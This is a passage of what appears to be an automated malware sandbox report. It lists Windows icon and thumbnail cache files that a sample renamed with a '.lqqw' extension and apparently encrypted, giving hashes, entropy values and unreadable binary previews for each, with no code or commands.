                                                                                                                                                                                                    SSDEEP:384:FzQo3l8lTA4ifEYhfc671EECoh+RwmpGfs0sMJWv:Zhl8pA4i/hfn71EEtAwXftJ8v
                                                                                                                                                                                                    MD5:518D9C62E918DBEBDC25846531F40AEB
                                                                                                                                                                                                    SHA1:16D500635338DE56813CD151CAAE4A3448B42FAA
                                                                                                                                                                                                    SHA-256:481E4A7CA503208C543826E9814DC884F4C62DDF3D8D9F60AE5D6E0FD9A41345
                                                                                                                                                                                                    SHA-512:BDE63BAA983C7EA7F3AC3A2A3FF442F18B33C10718BDF9FFC46152A7FBC3DF35C4C9191CA156E50AB41DC5DCC920108ACB617AC974E17CFABF58002128E17214
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: O...=Z_..*J.}....-.u..W%b..u.a.z...<...XZ.....G^YC...d..qCl..F..19oJ..@..h.\'...T.]<.bE..6.8IB.A.-..w...r.\..m.~..z.8..T,..=....J.T.Ge=.p.V@....h.[.t.!N.,w.4..c.......o.y.\Ve.0.r9..c......Aj..V.5.....OR.1..x..^..J{.v/.6..,+.N.t.+kH.r).$. .M...!..z.......:...xV'.`.$......./.|..w.,U.a_..o.4..]@..2!...2.g...Zs..=.3....l.].ST....b.;....WB.|..#1d.v.S.qa'....V.o.cP.YA...<...!Z...T(..D...@.]....f.i..vE.KUn..W6N.n.:C.8.{....(.q Q.2.%."PB`..)..M.q,..W.JLH.r.8..oK..Pv`.. f..*....=......SQ.O.B..>.4....w....o..1..D.A|#.[ .....M.(.......+...\e..D.[.<*..N@.:.#.R'Y.LE..u......NZ.kH.Fs#..R}....._.b.....;......t..u..6_.B.k...k{...=..Of.AN.h.}g....T...|..K,(_..qQ*.<.m...uK...B]..W8..`.5.,.. ..3.Fq2....!..L..d..f ..T..pv......../.R...X#...?.s....m.mN.r...^Y.........g.7xz~>...A......E..t...PT7nF,r....M..C...bU.F.e.O{....Y+uv.J+....E...?.g..mb.............%.02.6..r..%.i......v.......ij..[@..<lQ6.X..e...?}].....'d.....L..HP.ba...ME0.uw9.<..A...T,...A.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1280.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.247637758710563
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:OXQxkOuwZiYA1hqajtzUFC7HltxbjmKN6wdGVrt7v3yaYyXoT0Bl75dExcii96Z:kEkOuGOhTz/7FtawdQv3ya2T0ocii9a
                                                                                                                                                                                                    MD5:237D7AB3E77993982DCC3094F09C20A6
                                                                                                                                                                                                    SHA1:EE1DEE3F339520B000ADEAD7EF1482355927B2ED
                                                                                                                                                                                                    SHA-256:DF4AED7EEE30F008E73EB99A5D9247B32C55A6C62DD0B33A9EA9E21339C163D8
                                                                                                                                                                                                    SHA-512:E82CF0928CB7081A7A21B793C142F099517ECE6E49AF5CB6EE2B3689A347A43B50591C2D6619E7DE6B1A75BEE4186691BFEB339B714A42317655602000C6413E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f@5...........R.0.....,.{..=:......"w..4..N-b...szRYm........r.@..7.D...t..%.5.e.:.+m..W..i.Q..^....20N.Z..|[&..q.f..*.*.GJ.....6(..<J....[..p.;...=h.B.>.Z....H.k..|.N.uO..J..P....t.A.......)1[..@1.gG...X.h...C"*..&\...0Vi.J.0..T....e..].U...2..B...Q.....Fr..8'5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1920.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.230377261843757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:v9Vw/TplE1ZgKu9KKal9pnni/RNGqLJG4kJTSaTcASCEKhL2sMSP2Z2GXH75dExX:v9VN1Zef2Xip4qLUtAa41K92sMSPbGUX
                                                                                                                                                                                                    MD5:F2BB9732A79FA92A1FC4E787E0C3487E
                                                                                                                                                                                                    SHA1:44F6181214CC4E4A26401C719170DE55C816B491
                                                                                                                                                                                                    SHA-256:85C8082BEA624EBEEA13F41BC303C84986EEA1CA22142BCADE23074E9FC62B78
                                                                                                                                                                                                    SHA-512:C6693C09A56B4E5CE998B29F65F2146CD98FED1CE6F4177BC37C1931F8F08AFBDE28C6867AE21FC6E195548BB9DB0ACB48F2FE51B177406B140437799C23CEC4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....~]tj.Zg.,......Z..]....K9# .C.,......f\...>a:xrV.6....:.p.`.&a........|.E...H..F.o.`.......k...i..?9..7..pzC......".... .9..-..j.&.Rr...E...U(,w....[..g.a.l.,.8...v..\%..KH.O.C....|...#..m..w..........+....r.85F.F?.0...h.Ju...<t..7&.E#.F.'....4.Ii9Q.....+..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_2560.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.218861874970469
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:ktRvOrAT5s6NtsUWQLu/euT8S/OaXA7BLpdzsEUY1SBwDe4Gp9zL75dExcii96Z:kRvjCN0Py8S/9mXzThSDxp6cii9a
                                                                                                                                                                                                    MD5:8C96BE8F87C18B5325AB213096C08D2A
                                                                                                                                                                                                    SHA1:71B92477949593416D7F3E15CC3DF4B8E6946B01
                                                                                                                                                                                                    SHA-256:63565AEC235D0B2F6763402BD90B843D55C21563FB6ECE43E156261B4DB0054F
                                                                                                                                                                                                    SHA-512:DB68EEB557E1E881ADDEA4F96E0C2EB39CEF1426319483AEFEA5F8D4EFAD7E4CDF079CEB25C70749DEBF3D4E46B62F523BAC4BF390F9372F176A7050959DDFBA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......v$-+x.BR.0.1.J}....ZM.l...=.......e....taR.....[.&|c.......1.&..AL..P9j0z[d...m..?.4.R...&...0..6..wL....1.zp.~.s..e.y.....0.. vZ.a.dT.........{6........lL`.l".apx.rA...)O%..l..=.SMf.K.lr......[+.-..(.."_.G..^l......8.R.e...idL}..3H.#@...8Z....~..{|'5....p.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_768.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.253532784198596
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:zChO2zD+tTXZ7Hi6xfgZb2n+HOD8vzrZhzXH75dExcii96Z:uhO22tTZ75Vgd2n+u4PZGcii9a
                                                                                                                                                                                                    MD5:B5FB8E349CAEC2E0AFCCBDB1726F6F99
                                                                                                                                                                                                    SHA1:EDD50639F7C6A118D4C4DD1FB3E04163D9097465
                                                                                                                                                                                                    SHA-256:72A770158788394F37E76572FD352CC6BDC07F7FDF647409E74EF2E825F828B3
                                                                                                                                                                                                    SHA-512:DA0D0A847867F51AC1E1495A2AA8F48FDF7FABC26DE8D2B323D6DC2848D9DE7E86B5681E29D34A7F6A0445F4725A2241AE505486F0CA75E4D88201BEAB1B29E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..4....s.....+...9.R.F.v......H..0...fT....%;j..o.?...tJ>9K.N..I.p7\&"YX.L.+.D...)S..W^.g.EcJ+..8..z...<....C...xSk...o.c.Sw.U....Ys..W.[c._-.*..."...Be.4..p....U....|".1y...._.>{.7....l...?..R..+.....5...P...P$.f.S$.`.%.6.Q.Z..w..z.FI..Y.].O..f.h..C..!..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_96.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.255744452898672
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:w1QtMmibEU7ZEbJVm4xi0pP2urPQwuQELZxrSm7+mY+aQH75dExcii96Z:wtbxNEx8cP8QEtxrSLm1aQkcii9a
                                                                                                                                                                                                    MD5:B58C628A20FEC4E7CB584B84D562D980
                                                                                                                                                                                                    SHA1:C57912C4777A5D8156C366153CBB29471093C76C
                                                                                                                                                                                                    SHA-256:37ADD23AE34015E740D534102402673D294004E6100C5EEB4888053F915F6FA5
                                                                                                                                                                                                    SHA-512:CA165B2AA276AE017DCEA7E2C29F0F78C5AC30FCE49E2098CC8F46DDBC44934088222861825BA7AECA13F1DC2DE05F4907E031263B8374AC6801553A9CF631BC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: _.6NL.5...z6.._o.-]...&V.a...X..B....4..'kI..xoi. 7.;V|..2..I.'.CRj..F..........EM...l3.l.g.......H9.X.....}....W..Y.p....$.TS....'..$Q.....`pN?..>......=.}C#.~.....Qh.B......4.y.\........&..z.f.s.;(.8.'...... G..k....j..<.f..Y#.=.Y........Q_.S)^'............5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_custom_stream.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.228337733236609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:3xp0OxtSAc+d8QpxO4njPL4CXHwdF5DlJUczfi75dExcii96Z:3xao1lzHjDJXH47zUczPcii9a
                                                                                                                                                                                                    MD5:E660A5DD6DE7AB7A8ACEE60AF520E526
                                                                                                                                                                                                    SHA1:53F9C5A348839389E33876777C544975FF0CCA30
                                                                                                                                                                                                    SHA-256:4556737772DD0FAF6B3B52680943C1BC5193CD75754D11FD77B4A92CBA9DE6DD
                                                                                                                                                                                                    SHA-512:DDDF6E7D61BF2B35D930E4DAEBE30059A9C777ED5C4B572C8FF2EF1C9084F00F2A741B5BD650683EC33343777B7F0C8678D577D23C8150DB928E695121EFBAC0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .._.i...tkR..(,.....U..>GY<...+o.gG..L....S...&M.k.N.f...~..S'...f...x..V..<YV.,k..q..OF=.....cq.!.TC..Y.%f.4}K...\......i...)..nB.-=^.#...&...QO.k....m...j1.u...... .zS....~....@..,....;.;+C..^.56...?..bn..J7#t..Z|o.x........FC=y<..w&........b|.7)....L6[..KFd.:.[5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_exif.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.228567036345031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:PSpGksLMs3FWTXPdH22zYMEOchfUizlx04Uz9Qd5un0c4T0zA6CSiJHEl75dExcq:6pGVf1k5sMEOchJCj9QH64TIZifcii9a
                                                                                                                                                                                                    MD5:1250463B9DC1B044A820432AECBB2BB4
                                                                                                                                                                                                    SHA1:A82A72EFEFC863292D7139DDCDE63690B94EE8D2
                                                                                                                                                                                                    SHA-256:BD183E62BCF0620C03FAE358C4DA3967F44D5092C9AB55CE9F757C2FD9436B28
                                                                                                                                                                                                    SHA-512:2E238B3215AC4A9F4D214E959EF7ABFF1D5BDB16403FB7EAEF576D6BF1B761F8FFAC2043981334507102169E24942CA2581E5F73004F71882F650428B72B348E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 4 ...L...*5....!...a.H.g(......C..\ ..\..Q.5.K.....U.<B.j.G.fsg.P....^.s*h...0%{.........N.M...x!u...@I..N..M'..QX..i.J,?*..E.9.....2.~.a.d.m...fQ4...^..av....w.:....-4{..=J.tjd....2....5,.r I....Q....J.....p..?R..#.n.a.j&.q..l).S...M.*.\>.6.....,.....d..* ...."..t..h5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_sr.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.242312572007322
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:LtM3MYerB9aNj3QQI1mULrhRCWfzODg7bJQRE74rRaXUcri75dExcii96Z:ZsMFrB4p3RI1mSrhX7bm274laXl7ciik
                                                                                                                                                                                                    MD5:70CD538E74B00F377D613B051C6712ED
                                                                                                                                                                                                    SHA1:24715BCB444D59D201D5F63E6903142A4FAFA744
                                                                                                                                                                                                    SHA-256:69C4685F8B9D6D4115D10A6AC7872DC9C92DD40B8FF8911DD4B810EAB4D944FC
                                                                                                                                                                                                    SHA-512:C8C0142799CE9C76636AB70967A776426540DF103BB94CD6AE3FB98210206CBDE17B6046ED69AFC4952977505B37843F1F84009AF49AD987E1F55AE36732D0F2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......k...m*WR.}.9.k..J...).=.>..[F.K.D9.....-.O.....^..z9.6...........A..".<.N..4............p...rc..y.+....B.....9x}.}.....5....P..Y:4.q@..X...`jdnwI&..O..!.~.......><d.-..R+..g.e`..`.R.6_..k..9.0...;R.y.F..r.,.,V....OU.....%P...".}._[Hi.G.....P....]RA.6.n.ye5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.210812343797869
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:scpJOZES84WkuphhlwS5LZ/DwUCqeRWc+3+87p3Y8PPno3lGJD75dExcii96Z:1MB84juLvwSlOUZK+Oao8PPojcii9a
                                                                                                                                                                                                    MD5:7CE6A80582CF09BE148BFADFC58B8C0F
                                                                                                                                                                                                    SHA1:97AC5798FFD5D7C2F6A4BD877D60652ABFD368CA
                                                                                                                                                                                                    SHA-256:499CA4BFB5B020153D27E7DB4F517B136E382C0268C9E0843C579E0FC367D345
                                                                                                                                                                                                    SHA-512:ABF6363D684875B221894E93D7E3AB0EDB79C55ED3044938A339E744FFD619061916715C6FA1A90185EBE73529D1E999DB7498B5053081A5359BC78D7D01FC18
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...S^....B.-P....G..|..0*.PJ*...a#...nM(.h..a.A`...^....w..F'...*..=9d........!......`.D_..\..1.y.F...O..-.IQ1....u1..?z.qc#...C...rF.c...9..%`.;...:\.....h.3y..VU.(4.TjNH....k.p_=.{G.N.....}....Qr...y*.y..vb.kY[th.7a..;l.H..?T.1......i#.j...j#7...x..T.+..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.288935433127205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:2df7ySjchSj6G58QulnMR6kym65CF+BBG/542m75dExcii96Z:Uf7yqam6GWMR6bRcwMdcii9a
                                                                                                                                                                                                    MD5:B81235F5144A6E34C50BA1532207B4FA
                                                                                                                                                                                                    SHA1:95363EBE39319D6B4DFFBC099A60B761C3509DC5
                                                                                                                                                                                                    SHA-256:F868001E263CF037B6EAC9B1554DA7584DFC3FDCB8654AC80A3D9CDA8D05451B
                                                                                                                                                                                                    SHA-512:4DAA853183AFB731DE9EEFFE7C027DA71E9E8913CC6A2331B23D54194B948057D72617077FD5289D301BEF773E2E90E76C07958C2314292B7B67FA181B971D02
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |H.....&..]...6!..t....,"A.....U..}...Z...Z]..M.........Ov/n...q....+r...S.......*c.w.?..w.q..aH.:...Z.*..B.[....d2e....Q?q..M'.'H..G{..b.W..]j.P.}*n..k..t.?.;.4.J..0.*..%.....j.hQ...7E..H^.0^....o....u.JF$..Y].....S...5M..9.]7T............s.gJ}-.3..E(|N0)E..98......!..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1280.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.199021825175427
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:aLLUDkLOXt9SQxgKUV67PFVpsOpAl382Pd0TGqpmizJhO81MQD75dExcii96Z:mLUwLmDSQuKU8PFVDAW2Rqpmmwcii9a
                                                                                                                                                                                                    MD5:BC6A6D0DB517744908C03C15CE1F4188
                                                                                                                                                                                                    SHA1:071E3AD9E46C0E3360DF60174D0290463D69F30E
                                                                                                                                                                                                    SHA-256:3E6ADD917034D465733B19B6FAABEDDBA124BE49F17529BC8E4B555914C9727B
                                                                                                                                                                                                    SHA-512:88F474209CDCCD146E4A3D642954E531A8C4325E6E614DE0ADBEC962CA79075F0A48CC9F4D2EE1FCF90362FA3A178FAF0059D535BE01949897DE9E94BE96300D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..-...!9.vL[...4...[...bt.F....@E.\. g..>.X..K..eE%.>.F.F..^[`o._T.O......]..mV;.OJ.EIhM.z@ .#.>G5.......t...,.}B^....,.......U...g..Y.t.+....{..0.S....+4..%..^..?..M../KV...ez2.X.|..&.!.3.R.V.y....v..a.....?.sJ"....9i.X.4QD.|...e.. ..z....N.L'.....>.2.8.I_...L......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1920.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.302852641236031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:7F7LFa62Ozu91ObtOZGhQB+J5AYiIRE9r5aCH2K75dExcii96Z:hJ+cuXOBhhQB+veIC7aCWPcii9a
                                                                                                                                                                                                    MD5:384D39ACFCA240D015005B9D834DC057
                                                                                                                                                                                                    SHA1:FEF4C0CB1BD948624441510AB92AA7C09673A7D3
                                                                                                                                                                                                    SHA-256:C04E7608D823C64A08F21919F8A3DE4835F9DCFCF6DA053611B939A3CEAF661F
                                                                                                                                                                                                    SHA-512:68A7DF74C9B306B1B9524088B72FE85740DB0B5AE69E85A6EC68F384BB2126B8DBD0CD58E586A65200B5D64A01AA4A45A794CF191D7BEE2D08D707B1EAC05E8F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: r..|u...*V......%..yB..x.AV..).S8.g..T...j[.,....5..ek.f..... (.~.y.....#....vCP.)X..O.!J....~*....Q#.\...E;.MlA..S.....r..^p02...n1.kD....T@..VY..<.k3..y.,*[Z.....+.l.%W%.@..R....;.....k@09VQM`..f.V."...y^.Z..p......).x..g.....5..#..^.....(.....%b..C._..Kqn.W.G5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_2560.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.25823172099428
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:0qjkHCbWFMeyjDJgYCpjXRlp+5KiXpToV/ck6yzk0fdx4FCl75dExcii96Z:0qjkHC6FSjDe5XA5KupTof670fz4dciD
                                                                                                                                                                                                    MD5:F0CAC1B001CF313A2C88B1368CB7D9E2
                                                                                                                                                                                                    SHA1:93B4E988A1DE31750C00388329EF16FB1AE5A369
                                                                                                                                                                                                    SHA-256:F162D66A5FBFF148EE505A00C2EC5625A2E74E6520321670AA1008A4982FC22F
                                                                                                                                                                                                    SHA-512:E300CF648C6B6ADEB50B5BB54C2FB7DAC0AB890B139A459C1E34803154EFB7A00BB85A7E2FB3A8DC311A4E6408F5C169806BB518B171178C61ED7CE5B39B1C51
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <...D*'..n.m.2.r!S$...%..P.........Gu....O4.....'..5..x{..3..)......%G....QU...$.T.0|.G.....N..R....2.zj......TZ...............jX.e../v0/.?.=.#..#.Gw.v...'R=8.4...-c..!.Rd.....`^w.mm.x_.V.?..-...5.z.......i......#'$.2.Mz...=g.....y.k..s..o.J...}..=.M"%.F>...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_768.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.245097356355288
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:UyPBGeIvwKUHmM6uTO5VGkz2EGo1aDRWTSN/FKkFfVDFH6fi75dExcii96Z:UqBSwKKFKr/zjttK13DFHkcii9a
                                                                                                                                                                                                    MD5:A36C8D7BE2D382C02674EC4FCCA22B1E
                                                                                                                                                                                                    SHA1:F89A6CDA7573973AF2F9DAF07FB0436680DFE689
                                                                                                                                                                                                    SHA-256:B21C843FDA1D75A4BD6541131F566A9EC13FDEC04EB9CA72EF23EF56F0AC3B15
                                                                                                                                                                                                    SHA-512:38370F667ADA911F5986895375ABCFF3FAF96A97F01F7E8294CA815A17200EE57CA691B181C4DCBD2F3D8A5CB378934C96B02A3D3DF6863F9D99A0A44D4B2DD0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +.5....5...%..s.fy]....{^.w..fd..\..A..w3.;#,?.fQ...%.-.2..$.:..eC..[E..2.F.@..,...."......B.$I....(.J......56..[.....bQ.0a..A..y..?.bx...~.....F...FlT|(.j.&.)....,.a...p8U.j..!T...@1....E.HF..gu....7.b.Z]:.K...l...O.!=...^.M.\Ye....6>...TV.5.K.?...L..N?.~e5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_96.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.233675189607391
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:32n0QkT1m9YPnW9BBNBEr2CDesiIoT3G6Riu+ashWel5nX5sD75dExcii96Z:32n0bT1m90eNBC2CEf7zR1+asA6JJciD
                                                                                                                                                                                                    MD5:680328DB4FBC08695A977A964297D068
                                                                                                                                                                                                    SHA1:C9D854436024AE6B922A9279D0E0F4A6AC586958
                                                                                                                                                                                                    SHA-256:3ABB58888B8050AACAA8B5DD62A0144D0F5D66E0BCEA2196B539C1A9432B483A
                                                                                                                                                                                                    SHA-512:ECDF25323693CD959E92C6DDC336FE55E784BFFFC9FCA1DDD18377C48FDF0D75BC0A9EEED3CF06FB040C417049649288BD23A4B41EE0056DE34A234BB35FD7E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ~l....W..p.n........wZ6.D..6pN.k....[..jG..>......aT4.n..Y.P4...8...).f.`.Y.R#=hc%H...!..mW.....:N...ua............H...R:..o..cT.z...I.Yk../<..w.h.....1.K....i.f..n....D..M.q.#\*..M..w.0.3.E......;........"../>`..~..jEw9#->..;.xPo~\..7*.ls.i.DX7..bF.sI3G%I.....}...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.182254428791429
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:zH5u7CYbWkCDytxGj2Uea4pEn2OibyQ7h5jjo5Y5Sr8cc4QjE1l75dExcii96Z:uCmnK2ratXAqY5SIckjcucii9a
                                                                                                                                                                                                    MD5:C2B3A78A9C398D0EEFFB215B3A4A5A8A
                                                                                                                                                                                                    SHA1:E791E746B9635ACB14F95B57D55EA374B66CDD1B
                                                                                                                                                                                                    SHA-256:03C7A27FE014828662F7A2E75A2406798E6DA5B76BB0893DD64700FAD421F4E6
                                                                                                                                                                                                    SHA-512:F60C3E0AF8FB4E2F3FC5BEA9BB6AECFF106DA367414AF054DFD5613E936C46A234EDCAD66BF75380C9763231D363FA23DE0C2CCCF089908D6EAFEEC901EDE460
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
